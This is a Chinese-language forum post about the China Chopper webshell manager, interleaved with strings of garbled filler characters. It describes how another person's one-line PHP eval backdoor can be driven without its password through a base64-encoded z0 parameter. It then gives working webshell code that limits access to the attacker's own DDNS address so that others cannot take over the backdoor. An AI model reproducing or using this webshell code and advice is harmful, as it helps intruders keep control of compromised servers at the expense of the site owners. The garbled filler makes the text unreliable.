今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞: F3 J! h4 g6 D4 h5 v, K
, \3 L1 _" d. g& F% V4 U4 F
就算你设置了密码,使用了eval($_REQUEST['moyo']);- }9 l6 h S/ S6 j: T8 ]5 A% r
) w1 S" _/ ?5 {$ @$ s
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门1 [5 h! ]/ X: J0 g
2 P, i' [( `' r4 g) U9 U. D" H因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
2 \' a8 h6 r$ p
5 v+ A2 s ~& x2 r# N' s. M直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了3 g2 l2 r: U! u- E
" U" a, O& o" b7 ?. H/ \不知道是设计缺陷还是故意留的后门
/ s8 Q: d: M6 k" a% t# F1 ^6 n9 c0 Z, I) K. |
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用+ P- Q" g% J2 \8 q. ~$ L
( J. F; p' j/ X+ f! p u本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
" w; w: c- X5 S7 }- s, C8 H; Y2 ~" j& S) p$ j- @
然后一句话后门这样写
- h; u$ w3 M) @
' ?$ ?7 @9 `- X" B3 ~( L" Y<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
" g* e6 G! Q# t2 z T- w% w% c这样就可以让一句话后门只允许自己的电脑连接了
7 j/ a- M; P2 a1 @0 o
1 P5 d1 N# f% `& R/ o# Y. I |